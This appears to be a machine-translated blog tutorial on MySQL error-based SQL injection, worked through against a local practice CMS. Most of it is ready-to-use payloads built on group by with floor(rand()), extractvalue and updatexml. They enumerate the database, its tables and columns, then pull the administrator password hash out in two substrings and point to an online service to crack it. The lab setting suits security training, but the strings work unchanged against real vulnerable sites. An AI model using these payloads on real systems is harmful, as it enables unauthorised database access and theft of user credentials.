Error injection

In the process of judging the injection point, it is found that the error message of the SQL statement in the database will be displayed on the page, so the error message can be used for injection.

The principle of error injection is to execute SQL statements in error messages. There are many ways to trigger an error, and the specific details are different. Here it is recommended to memorize the formula directly, and replace the 1=1 part with the formula tape.

Common method

group by

?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from
information_schema.tables group by x)a)

?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit
0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

extractvalue

?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))

updatexml

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)

case environment

PHP environment: phpstudy20261103.exe

Range: cms

Collection address: Link: https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
Extraction code: jap0

Obtain the password of the website background administrator account

The address with sql injection in the cms shooting range: http://localhost/cms/cms/show.php?id=33

Note: the length of the string concatenated by the concat() function is only 31 digits, so you need to use substr to intercept the result, and then obtain all the information by replacing the intercepted subscript

Chaku

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
或者
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))

check table

-- 查询从1到31的字符
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),1,31) from information_schema.tables where table_schema = database()),0x5e))

-- 查询从31到61的字符
?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(table_name),31,61) from information_schema.tables where table_schema = database()),0x5e))

check field

?id=33 and extractvalue(1,concat(0x5e,(select substr(GROUP_CONCAT(column_name),1,31) from information_schema.COLUMNS where table_schema = database() and table_name = "cms_users"),0x5e))

Check data (password)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)

1-16 digit password

e10adc3949ba59ab

17-32 digit password

be56e057f20f883e

Splicing password: e10adc3949ba59abbe56e057f20f883e

cmd5 decryption:

MySQL error injection

Article directory

Error injection

Common method

case environment

Obtain the password of the website background administrator account

Guess you like